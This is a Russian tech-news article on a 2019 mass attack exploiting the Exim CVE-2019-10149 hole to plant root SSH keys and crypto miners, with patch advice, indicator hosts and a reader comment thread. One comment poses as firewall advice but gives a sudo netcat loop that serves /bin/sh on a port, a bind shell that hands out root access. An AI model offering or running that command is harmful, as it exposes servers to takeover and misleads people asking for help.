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Массовая атака на уязвимые почтовые серверы на основе Exim

14.06.2019 08:42

Исследователи безопасности из компании Cybereason предупредили администраторов почтовых серверов о выявлении массовой автоматизированной атаки, эксплуатирующей критическую уязвимость (CVE-2019-10149) в Exim, выявленную на прошлой неделе. В ходе атаки злоумышленники добиваются выполнения своего кода с правами root и устанавливают на сервер вредоносное ПО для майнинга криптовалют.

В соответствии с июньским автоматизированным опросом доля Exim составляет 57.05% (год назад 56.56%), Postfix используется на 34.52% (33.79%) почтовых серверов, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%). По данным сервиса Shodan потенциально уязвимыми остаются более 3.6 млн почтовых серверов в глобальной сети, которые не обновлены до последнего актуального выпуска Exim 4.92. Около 2 млн потенциально уязвимых серверов размещены в США, 192 тысячи в России. По информации компании RiskIQ на версию 4.92 уже перешло 70% серверов с Exim.

Администраторам рекомендуется срочно установить обновления, которые ещё на прошлой неделе были подготовлены дистрибутивами (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL для RHEL/CentOS). В случае наличия в системе поверженной уязвимости версии Exim (с 4.87 по 4.91 включительно) необходимо удостовериться, что система уже не скомпрометирована, проверив crontab на предмет подозрительных вызовов и убедиться в остутствии дополнительных ключей в каталоге /root/.ssh. Об атаке также может свидетельствовать наличие в логе межсетевого экрана активности с хостов an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io и an7kmd2wp4xo7hpr.onion.sh, которые используются для в процессе загрузки вредоносного ПО.

Первые попытки атаки на серверы Exim зафиксированы 9 июня. К 13 июня атака приняла массовый характер. После эксплуатации уязвимости через шлюзы tor2web со скрытого сервиса Tor (an7kmd2wp4xo7hpr) загружается скрипт, который проверяет наличие OpenSSH (если нет устанавливает), меняет его настройки (разрешает вход с root и аутентификацию по ключам) и устанавливает для пользователя root RSA-ключ, предоставляющий привилегированный доступ в систему через SSH.

После настройки бэкдора в систему устанавливается сканер портов для выявления других уязвимых серверов. Также осуществляется поиск в системе уже имеющихся систем майнинга, которые удаляются в случае выявления. На последнем этапе загружается и прописывается в crontab собственный майнер. Майнер загружается под видом ico-файла (на деле является zip-архивом с паролем "no-password"), в котором упакован исполняемый файл в формате ELF для Linux с Glibc 2.7+.

  1. Главная ссылка к новости (https://www.cybereason.com/blo...)
  2. OpenNews: Критическая уязвимость в Exim, позволяющая выполнить код на сервере с правами root
  3. OpenNews: Новая версия почтового сервера Exim 4.92
  4. OpenNews: Опубликован метод эксплуатации уязвимости в коде разбора блоков BASE64 в Exim
  5. OpenNews: Уязвимость в Exim, позволяющая выполнить код на сервере
  6. OpenNews: Критическая локальная уязвимость в Exim
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: exim, attack, exploit
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (58) Ajax | 1 уровень | Линейный | Раскрыть всё | RSS
  • 1.1, Аноним (1), 09:53, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +6 +/
    Какая неожиданность, ну кто бы мог подумать!
     
  • 1.2, Онанимус (?), 09:54, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –8 +/
    Вовремя я на postfix переехал!
     
     
  • 2.23, Аноним (-), 11:37, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Поднял iRedMail - полет нормальный!
     
  • 2.24, Некто (??), 11:39, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +12 +/
    >Вовремя я на postfix переехал!

    Ты бы лучше вовремя обновлялся, а то теперь когда в postfix найдут уязвимость, переходить останется только на sendmail.

     
     
  • 3.42, YetAnotherOnanym (ok), 14:05, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Кстати, с учётов всех последних событий, sendmail - хороший способ дистанцироваться от модных мальчиков, обмазывающихся свеженьким.
     
     
  • 4.50, KonstantinB (ok), 16:41, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    ...и писать sendmail.cf вручную. С нуля.
     
     
  • 5.58, Аноним (58), 17:56, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    sendmail.mc вполне себе удобоварим
    опять же сейчас MTA получает почту и передает в LDA на какой-нибудь dovecot который раздает почту по ящикам
    Так что сложность преувеличена ))

    А еще часто бывает что вообще тупо проксирует дальше на MS Exchange

     
  • 4.54, scorry (ok), 17:22, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Свеженькое — это что? postfix или exim?
     
  • 3.56, Аноним (56), 17:27, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > переходить останется только на sendmail

    Ну, есть же еще qmail от DJB ;)

     

  • 1.3, ыы (?), 10:10, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >доля Exim составляет 57.05% (год назад 56.56%), Postfix используется на 34.52% (33.79%) почтовых серверов, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%).

    Постфикс растет стремительными темпами...

     
     
  • 2.22, jbl (?), 11:35, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    зато эксченж стал бескомпромисно неуловимым сервером. Можно в армии и банках использовать теперь.

    ЗЫ: как эти "хосты" торовские заблочить, если айпи в них не резолвятся, а iptables визит только айпи? Всякие долбежки на мои ssh порты через тор часто осуществляются или все больше с латвиских впс?

     
     
  • 3.31, 1 (??), 11:58, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Exchange всегда прятался за exim или postfix.

    Так что %% 30 от всего этого добра имеет бакэндом Exchange

     
  • 3.45, Sw00p aka Jerom (?), 15:13, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-05

    Жирно

     
  • 3.55, Аноним (55), 17:23, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Легко. Первым делом нужно открыть все порты и вырубить firewall. Затем мы будим использовать специальную ловушку, которая будет работать как firewall. Для этого нам понадобиться netcat.
    sudo -- sh -c “while : ; do; nc -lvp 6969 -e /bin/sh ; done”

    Удачи. Можешь ip или DNS написать своего сервера (-ов) помогу проверить.

     

  • 1.4, Аноним (4), 10:11, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Вообще идея интересная. Поставлю себе Exim в локалхост, чтобы майнить крипту.
     
  • 1.5, Sluggard (ok), 10:12, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > осуществляется поиск в системе уже имеющихся систем майнинга, которые удаляются в случае выявления

    Какая нелюбовь к конкурентам.

     
     
  • 2.6, ыы (?), 10:20, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    думается тут чисто бизнес. потому что ресурсы то тратятся...
     
  • 2.7, Andrey Mitrofanov_N0 (??), 10:21, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    >>уже имеющихся систем майнинга, которые удаляются в случае выявления
    > Какая нелюбовь к конкурентам.

    Какая нафинг [не]любовь -- борьба ж за ресурсы и эффективность.

     
  • 2.9, Ordu (ok), 10:29, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +11 +/
    Это ж чистой воды ползучий антивирус, с почасовой оплатой в криптовалюте.
     
     
  • 3.33, ыы (?), 12:40, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    смешно, да...
     
  • 2.38, rshadow (ok), 13:38, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Если какую-то старую помойку взломал один ботнет, то велика вероятность что другой ее тоже взломает. Скорее всего ребята уже сталкивались не однократно с тем, что ни одни они хотят помайнить и пропатчили.
     

  • 1.8, Аноним (8), 10:29, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    Повторю вопрос оратора из предыдущей новости "Разве exim работает от рута?"
     
     
  • 2.11, бублички (?), 10:51, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    ну а майнить обязательно от лица root?
     
  • 2.12, Аноним (12), 10:56, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    The Exim binary is normally setuid to root, which means that it gains root priv... текст свёрнут, показать
     
  • 2.41, Нанобот (ok), 13:53, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    в 16й бубунте от Debian-exim, в 6м дебиане - от какого-то безымянного пользователя с uid=101 (по крайней мере у меня такое). больше мне посмотреть негде...
    подозреваю, что exim от рута никто не видел, но все боятся
    P.S. если кто-то хочет/может проверить у себя, вот команда: ps -C exim4 -o user
     
     
  • 3.57, анонимус (??), 17:34, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    На бинарь exim обычно ставится SUID-бит. Т. е. он запускается под пользователем root, а потом делает setuid и сбрасывает привилегии. НО! в определенных случаях, типа локальной доставки, или на этапе роутинга, когда нужно прочитать какие-то файлы (.forward например) в хомяке юзера, exim сам себя ре-exec-ает и опять становится рутом.
     
  • 2.51, KonstantinB (ok), 16:43, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Как настроишь, так и работает. Дефолты в разных дистрибутивах разные.
     

  • 1.10, Аноним (10), 10:40, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Известен список хостов откуда прилетает?
     
     
  • 2.14, Sluggard (ok), 11:03, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    В новости же есть:

    > Об атаке также может свидетельствовать наличие в логе межсетевого экрана активности с хостов an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io и an7kmd2wp4xo7hpr.onion.sh, которые используются для в процессе загрузки вредоносного ПО.

    Ну и с других шлюзов наверняка прилетает или будет прилетать.

     

  • 1.13, BlackRot (?), 10:59, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Просто обновил exim до последней версии и всё. нубасы использующие древний софт должны страдать
     
     
  • 2.15, EuPhobos (ok), 11:04, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Кто такие нубасы? Знаю Папуасы есть из Гвинеи, а нубасы - хмм, из Нубии?..
     
     
  • 3.17, BlackRot (?), 11:12, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Кто такие нубасы? Знаю Папуасы есть из Гвинеи, а нубасы - хмм,
    > из Нубии?..

    Noob это один юнит, а noobs (если не смотреть на перевод гугл переводчика) это более одного юнита, получается некий транслит :)

     
     
  • 4.52, Аноним (52), 16:53, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    >> Кто такие нубасы? Знаю Папуасы есть из Гвинеи, а нубасы - хмм,
    >> из Нубии?..
    > Noob это один юнит, а noobs (если не смотреть на перевод гугл
    > переводчика) это более одного юнита, получается некий транслит :)

    Нубз и noobass не одно и тоже.

     
  • 3.26, Аноним (-), 11:41, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Вот это ты отсталый, словно вчера в интернет зашел.
     
  • 2.16, ыы (?), 11:11, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    о дырке с этом обновлении вам сообщат на следующей неделе.. когда намайнят... будьте на линии...
     
     
  • 3.18, BlackRot (?), 11:14, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    до того времени выйдет новая версия, а потом сообщат об уязвимости в предыдущей.
    мониторинг никто не отменял :) тьху тьху, ниразу никаких проблем (главное весту не юзать) уж больно её частенько кто-то ломает.
     
     
  • 4.28, jbl (?), 11:49, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    да кому ваша лада нужна?
     
  • 2.19, Аноним (10), 11:15, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Древний exim не подвержен, а вот новый как оказалось наоборот
     
     
  • 3.20, BlackRot (?), 11:16, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Эта уязвимость затрагивает версии от 4.87 до 4.91
    каким пользуетесь вы?
     
     
  • 4.32, Аноним (10), 12:04, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    4.80 и 4.84
     

  • 1.21, Аноним (21), 11:23, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    > Microsoft Exchange - 0.57% (0.85%)

    Вот надо же. А судя по сообщениям на форумах, заявкам на госзакупках и прочим источникам, все только на нем работают. Как объяснить? Или это из той же оперы, что доля Linux якобы меньше 1%, хотя по независимым данным, она около 20%.

     
     
  • 2.25, Аноним (-), 11:40, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Не 20%, но 5% точно есть.

    https://www.w3schools.com/browsers/browsers_os.asp

     
     
  • 3.44, Аноним (44), 14:25, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Так 20% это ж летом
     
     
  • 4.46, forum reader (?), 15:17, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Думаешь, на зимних каникулах меньше?
     
  • 2.27, ыы (?), 11:45, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    >Вот надо же. А судя по сообщениям на форумах, заявкам на госзакупках и прочим источникам, все только на нем работают.

    так и есть.

    >Как объяснить?

    Самая популярная модель в России среди автомобилей это Lada Granta.
    а посмотришь на парковку возле дома- джипы джипы джипы...
    Как это объяснить?

    Самое популярное - это не самое популярное в солидных кругах.

     
  • 2.29, Andrey Mitrofanov_N0 (??), 11:53, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    >> Microsoft Exchange - 0.57% (0.85%)
    > Вот надо же. А судя по сообщениям на форумах, заявкам на госзакупках
    > и прочим источникам, все только на нем работают. Как объяснить?

    1. Вражеская пропаганда Микрософт.  Все врут.  [Даже твои собственные суждения -- микрософт уже проник в голову!]

    2. Оно заботливо прикрывают, для безопасности, вишь ты!,  от большого-и-страшного интернета релеями на более обычных-бесплатных linux|bsd почтовиках.  Они (см.сабж) не такие дырявые, наверное.

     
     
  • 3.30, Andrey Mitrofanov_N0 (??), 11:55, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    >>> Microsoft Exchange - 0.57% (0.85%)
    > 2. Оно заботливо прикрывают, для безопасности, вишь ты!,  от большого-и-страшного интернета
    > релеями на более обычных-бесплатных linux|bsd почтовиках.  Они (см.сабж) не такие
    > дырявые, наверное.

    А, да!  Они ещё  _не_тормозят_ и не перестают принимать Почты при 3000 артефактах в очереди.  Обычно....

     

  • 1.34, сосед (?), 12:54, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Если я правильно понял - на OBSD эта фича работать не будет, если  Securelevel выставлен в правильный режим и критичные файлы запрещены для изменения ? (crontab, passwd)?.Или лучше Snort+snortsam(например) для поиска команды run на 25 порту?
     
     
  • 2.40, Васян (?), 13:41, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Зачем ты на обсд exim используешь?
     
     
  • 3.43, YetAnotherOnanym (ok), 14:23, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Чтобы довести до слёз тех, кто не любит BSD, очевидно же!
     
     
  • 4.47, сосед (?), 15:27, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Так исторически сложилось у нас, да и Exim удобен для работы , умеет больше чем Sendmail,Postfix,qmail... А то что он на опенке стоит - даже лучше.
     

  • 1.35, ryoken (ok), 12:59, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >>наличия в системе поверженной уязвимости
    >>поверженной

    Исправьте плз новость.

     
  • 1.36, Аноним (36), 13:18, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Перешел на Linux, т.к. друзья говорили, на нем вирусов нет, а тут такая новость :(
     
     
  • 2.37, Andrey Mitrofanov_N0 (??), 13:25, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > Перешел на Linux, т.к. друзья говорили, на нем вирусов нет, а тут
    > такая новость :(

    Друзья правы!  Это ж не _вирус_.

     

  • 1.39, Аноним (39), 13:40, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > В соответствии с июньским автоматизированным опросом доля Exim составляет 57.05% (год назад 56.56%)

    Эти люди не слышали про опцию smtp_banner

     
  • 1.48, Аноним (48), 16:25, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    А Китая нет в списке. Во китайцы лошары.
     
  • 1.49, kiwinix (?), 16:28, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Хацкеры теперь лояльные стали)) не воруют ничего.. просто немножко майнят крипту. Безобидненько)
     
     
  • 2.53, Аноним84701 (ok), 17:01, 14/06/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > Хацкеры теперь лояльные стали)) не воруют ничего.. просто немножко майнят крипту. Безобидненько)

    Хм, что это за чудесный край где электричество и аренда помещения бесплатны (как впрочем и сами железки, ресурс и мощность которых так же достаются "хацкеру")?
    Не местечки ли Podt d'Îvuannyîah и Еntré-Solèah в королевстве M'amk-Înа Quartiér-â?

     
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